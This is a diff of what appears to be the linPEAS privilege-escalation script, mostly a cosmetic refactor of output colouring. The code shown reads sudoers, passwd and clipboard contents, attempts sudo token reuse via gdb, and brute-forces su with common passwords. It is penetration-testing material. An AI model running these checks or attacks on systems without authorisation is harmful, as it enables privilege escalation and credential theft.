"https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" + if [ "$PSTORAGE_DBUS" ]; then + printf "%s\n" "$PSTORAGE_DBUS" | while read d; do for f in $d/*; do - if [ -w "$f" ]; then - echo "Writable $f" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g" + if ! [ "$IAMROOT" ] && [ -w "$f" ]; then + echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g" fi genpol=`grep "" "$f" 2>/dev/null` - if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$mygroups,${C}[1;31m&${C}[0m,g"; fi - #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${C}[1;31m&${C}[0m,g"; fi - + if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi + userpol=`grep "/dev/null | grep -v "root"` - if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$mygroups,${C}[1;31m&${C}[0m,g"; fi + if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi #for g in `groups`; do - # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${C}[1;31m&${C}[0m,g"; fi + # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi #done - grppol=`grep "/dev/null | grep -v "root"` - if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$mygroups,${C}[1;31m&${C}[0m,g"; fi + grppol=`grep "/dev/null | grep -v "root"` + if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi #TODO: identify allows in context="default" done @@ -1592,17 +1677,17 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then fi echo "" - printf $Y"[+] "$GREEN"D-Bus Service Objects list\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus\n"$NC + print_2title "D-Bus Service Objects list" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" dbuslist=$(busctl list 2>/dev/null) if [ "$dbuslist" ]; then busctl list | while read line; do - echo "$line" | sed -${E} "s,$dbuslistG,${C}[1;32m&${C}[0m,g"; + echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g"; if [ ! "`echo \"$line\" | grep -E \"$dbuslistG\"`" ]; then srvc_object=`echo $line | cut -d " " -f1` srvc_object_info=`busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' '` if [ "$srvc_object_info" ]; then - echo " -- $srvc_object_info" | sed "s,UID=0,${C}[1;31m&${C}[0m," + echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," fi fi done @@ -1620,55 +1705,55 @@ if [ "`echo $CHECKS | grep Net`" ]; then ########################################### #---------) Network Information (---------# ########################################### - printf $B"═══════════════════════════════════╣ "$GREEN"Network Information"$B" ╠════════════════════════════════════\n"$NC + print_title "Network Information" #-- NI) Hostname, hosts and DNS - printf $Y"[+] "$GREEN"Hostname, hosts and DNS\n"$NC + print_2title "Hostname, hosts and DNS" cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null - dnsdomainname 2>/dev/null || echo_not_found "dnsdomainname" + dnsdomainname 2>/dev/null || echo_not_found "dnsdomainname" echo "" #-- NI) /etc/inetd.conf - printf $Y"[+] "$GREEN"Content of /etc/inetd.conf & /etc/xinetd.conf\n"$NC - (cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf" + print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf" + (cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf" echo "" #-- NI) Interfaces - printf $Y"[+] "$GREEN"Interfaces\n"$NC + print_2title "Interfaces" cat /etc/networks 2>/dev/null (ifconfig || ip a) 2>/dev/null echo "" #-- NI) Neighbours - printf $Y"[+] "$GREEN"Networks and neighbours\n"$NC + print_2title "Networks and neighbours" (route || ip n || cat /proc/net/route) 2>/dev/null (arp -e || arp -a || cat /proc/net/arp) 2>/dev/null echo "" #-- NI) Iptables - printf $Y"[+] "$GREEN"Iptables rules\n"$NC + print_2title "Iptables rules" (timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules" echo "" #-- NI) Ports - printf $Y"[+] "$GREEN"Active Ports\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports\n"$NC - ((netstat -punta || ss -ntpu || (netstat -a -p tcp && netstat -a -p udp)) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+,${C}[1;31m&${C}[0m," + print_2title "Active Ports" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports" + ((netstat -punta || ss -ntpu || (netstat -a -p tcp && netstat -a -p udp)) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+,${SED_RED}," echo "" #-- NI) tcpdump - printf $Y"[+] "$GREEN"Can I sniff with tcpdump?\n"$NC + print_2title "Can I sniff with tcpdump?" timeout 1 tcpdump >/dev/null 2>&1 if [ $? -eq 124 ]; then #If 124, then timed out == It worked - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing\n"$NC - echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing" + echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED}," else echo_no fi echo "" #-- NI) Internet access if ! [ "$SUPERFAST" ] && ! [ "$FAST" ] && ! [ "$NOTEXPORT" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then - printf $Y"[+] "$GREEN"Internet Access?\n"$NC + print_2title "Internet Access?" check_tcp_80 2>/dev/null & check_tcp_443 2>/dev/null & check_icmp 2>/dev/null & @@ -1685,16 +1770,16 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then ########################################### #----------) Users Information (----------# ########################################### - printf $B"════════════════════════════════════╣ "$GREEN"Users Information"$B" ╠════════════════════════════════════\n"$NC + print_title "Users Information" #-- UI) My user - printf $Y"[+] "$GREEN"My user\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#users\n"$NC - (id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$groupsVB,${C}[1;31;103m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m," | sed -${E} "s,$knw_grps,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$idB,${C}[1;31m&${C}[0m,g" + print_2title "My user" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#users" + (id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" echo "" #-- UI) PGP keys? - printf $Y"[+] "$GREEN"Do I have PGP keys?\n"$NC + print_2title "Do I have PGP keys?" command -v gpg 2>/dev/null || echo_not_found "gpg" gpg --list-keys 2>/dev/null command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys" @@ -1703,46 +1788,46 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then echo "" #-- UI) Clipboard and highlighted text - printf $Y"[+] "$GREEN"Clipboard or highlighted text?\n"$NC + print_2title "Clipboard or highlighted text?" if [ `command -v xclip 2>/dev/null` ]; then - echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${C}[1;31m&${C}[0m," - echo "Highlighted text: "`xclip -o 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${C}[1;31m&${C}[0m," + echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${SED_RED}," + echo "Highlighted text: "`xclip -o 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${SED_RED}," elif [ `command -v xsel 2>/dev/null` ]; then - echo "Clipboard: "`xsel -ob 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${C}[1;31m&${C}[0m," - echo "Highlighted text: "`xsel -o 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${C}[1;31m&${C}[0m," + echo "Clipboard: "`xsel -ob 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${SED_RED}," + echo "Highlighted text: "`xsel -o 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${SED_RED}," else echo_not_found "xsel and xclip" fi echo "" #-- UI) Sudo -l - printf $Y"[+] "$GREEN"Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid\n"$NC - (echo '' | sudo -S -l | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sudoVB,${C}[1;31;103m&${C}[0m," | sed "s,\!root,${C}[1;31m&${C}[0m,") 2>/dev/null || echo_not_found "sudo" + print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" + (echo '' | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB,${SED_RED_YELLOW}," | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo" if [ "$PASSWORD" ]; then - (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sudoVB,${C}[1;31;103m&${C}[0m,") 2>/dev/null || echo_not_found "sudo" + (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "sudo" fi - (cat /etc/sudoers | grep -v "^$" | grep -v "#" | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed "s,pwfeedback,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sudoVB,${C}[1;31;103m&${C}[0m,") 2>/dev/null || echo_not_found "/etc/sudoers" - if [ -w '/etc/sudoers.d/' ]; then - echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," + (cat /etc/sudoers | grep -Iv "^$" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "/etc/sudoers" + if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then + echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW}," fi for filename in '/etc/sudoers.d/*'; do if [ -r "$filename" ]; then - echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g" - cat "$filename" | grep -v "^$" | grep -v "#" | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed "s,pwfeedback,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sudoVB,${C}[1;31;103m&${C}[0m," + echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g" + cat "$filename" | grep -Iv "^$" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB,${SED_RED_YELLOW}," fi done echo "" #-- UI) Sudo tokens - printf $Y"[+] "$GREEN"Checking sudo tokens\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens\n"$NC + print_2title "Checking sudo tokens" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens" ptrace_scope="`cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null`" - if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "/proc/sys/kernel/yama/ptrace_scope is enabled (0)" | sed "s,0,${C}[1;31m&${C}[0m,g"; - else echo "/proc/sys/kernel/yama/ptrace_scope is not enabled ($ptrace_scope)" | sed "s,is not enabled,${C}[1;32m&${C}[0m,g"; + if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "/proc/sys/kernel/yama/ptrace_scope is enabled (0)" | sed "s,0,${SED_RED},g"; + else echo "/proc/sys/kernel/yama/ptrace_scope is not enabled ($ptrace_scope)" | sed "s,is not enabled,${SED_GREEN},g"; fi is_gdb="`command -v gdb 2>/dev/null`" - if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g"; - else echo "gdb wasn't found in PATH" | sed "s,gdb,${C}[1;32m&${C}[0m,g"; + if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; + else echo "gdb wasn't found in PATH" | sed "s,gdb,${SED_GREEN},g"; fi if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then echo "Checking for sudo tokens in other shells owned by current user" @@ -1752,37 +1837,37 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then done if [ -f "/tmp/shrndom32r2r" ]; then rm /tmp/shrndom32r2r 2>/dev/null - echo "Sudo token reuse exploit worked! (see link)" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; + echo "Sudo token reuse exploit worked! (see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; else echo "The escalation didn't work... (try again later?)" fi fi echo "" #-- UI) Doas - printf $Y"[+] "$GREEN"Checking doas.conf\n"$NC - if [ "`cat /etc/doas.conf "$(dirname $(command -v doas) 2>/dev/null)/doas.conf" "$(dirname $(command -v doas) 2>/dev/null)/../etc/doas.conf" "$(dirname $(command -v doas) 2>/dev/null)/etc/doas.conf" 2>/dev/null`" ]; then cat /etc/doas.conf "$(dirname $(command -v doas))/doas.conf" "$(dirname $(command -v doas))/../etc/doas.conf" "$(dirname $(command -v doas))/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;31m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," | sed "s,nopass,${C}[1;31m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,$USER,${C}[1;31;103m&${C}[0m," + print_2title "Checking doas.conf" + if [ "`cat /etc/doas.conf "$(dirname $(command -v doas) 2>/dev/null)/doas.conf" "$(dirname $(command -v doas) 2>/dev/null)/../etc/doas.conf" "$(dirname $(command -v doas) 2>/dev/null)/etc/doas.conf" 2>/dev/null`" ]; then cat /etc/doas.conf "$(dirname $(command -v doas))/doas.conf" "$(dirname $(command -v doas))/../etc/doas.conf" "$(dirname $(command -v doas))/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed "s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," else echo_not_found "/etc/doas.conf" fi echo "" #-- UI) Pkexec policy - printf $Y"[+] "$GREEN"Checking Pkexec policy\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2\n"$NC - (cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${C}[1;31m&${C}[0m," | sed -${E} "s,$groupsVB,${C}[1;31m&${C}[0m," | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,$USER,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$Groups,${C}[1;31;103m&${C}[0m,") || echo_not_found "/etc/polkit-1/localauthority.conf.d" + print_2title "Checking Pkexec policy" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2" + (cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d" echo "" #-- UI) Superusers - printf $Y"[+] "$GREEN"Superusers\n"$NC - awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;31;103m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + print_2title "Superusers" + awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED}," echo "" #-- UI) Users with console - printf $Y"[+] "$GREEN"Users with console\n"$NC + print_2title "Users with console" if [ "$MACPEAS" ]; then dscl . list /Users | while read uname; do ushell=`dscl . -read "/Users/$uname" UserShell | cut -d " " -f2` if [ "`grep \"$ushell\" /etc/shells`" ]; then #Shell user - dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," echo "" fi done @@ -1790,17 +1875,17 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then no_shells="`cat /etc/passwd 2>/dev/null | grep -Ev "sh$" | cut -d ":" -f 7 | sort | uniq`" unexpected_shells="" printf "%s\n" "$no_shells" | while read f; do - if [ "`$f -c 'whoami' 2>/dev/null | grep \"$USER\"`" ]; then + if [ "`$f -c 'whoami' 2>/dev/null | grep \"$USER\"`" ]; then unexpected_shells="$f\n$unexpected_shells" fi done - cat /etc/passwd 2>/dev/null | grep "sh$" | sort | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + cat /etc/passwd 2>/dev/null | grep "sh$" | sort | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," if [ "$unexpected_shells" ]; then - echo "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${C}[1;31m&${C}[0m,g" + echo "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g" echo "Unexpected users with shells:" printf "%s\n" "$unexpected_shells" | while read f; do if [ "$f" ]; then - grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${C}[1;31m&${C}[0m,g" + grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g" fi done fi @@ -1808,38 +1893,38 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then echo "" #-- UI) All users & groups - printf $Y"[+] "$GREEN"All users & groups\n"$NC + print_2title "All users & groups" if [ "$MACPEAS" ]; then - dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$groupsVB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m," | sed -${E} "s,$knw_grps,${C}[1;32m&${C}[0m,g" + dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" else - cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$groupsVB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m," | sed -${E} "s,$knw_grps,${C}[1;32m&${C}[0m,g" + cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" fi echo "" #-- UI) Login now - printf $Y"[+] "$GREEN"Login now\n"$NC - (w || who || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + print_2title "Login now" + (w || who || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," echo "" #-- UI) Last logons - printf $Y"[+] "$GREEN"Last logons\n"$NC - (last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;31m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + print_2title "Last logons" + (last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," echo "" #-- UI) Login info - printf $Y"[+] "$GREEN"Last time logon each user\n"$NC - lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + print_2title "Last time logon each user" + lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," echo "" #-- UI) Password policy - printf $Y"[+] "$GREEN"Password policy\n"$NC + print_2title "Password policy" grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" echo "" #-- UI) Brute su EXISTS_SUDO="`command -v sudo 2>/dev/null`" if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then - printf $Y"[+] "$GREEN"Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC + print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC POSSIBE_SU_BRUTE=`check_if_su_brute`; if [ "$POSSIBE_SU_BRUTE" ]; then SHELLUSERS=`cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1` @@ -1851,9 +1936,9 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then printf $GREEN"It's not possible to brute-force su.\n\n"$NC fi else - printf $Y"[+] "$GREEN"Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC + print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC fi - printf $Y"[+] "$GREEN"Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC + print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC echo "" echo "" if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi @@ -1864,335 +1949,220 @@ if [ "`echo $CHECKS | grep SofI`" ]; then ########################################### #--------) Software Information (---------# ########################################### - printf $B"═══════════════════════════════════╣ "$GREEN"Software Information"$B" ╠═══════════════════════════════════\n"$NC + print_title "Software Information" #-- SI) Mysql version - printf $Y"[+] "$GREEN"MySQL version\n"$NC + print_2title "MySQL version" mysql 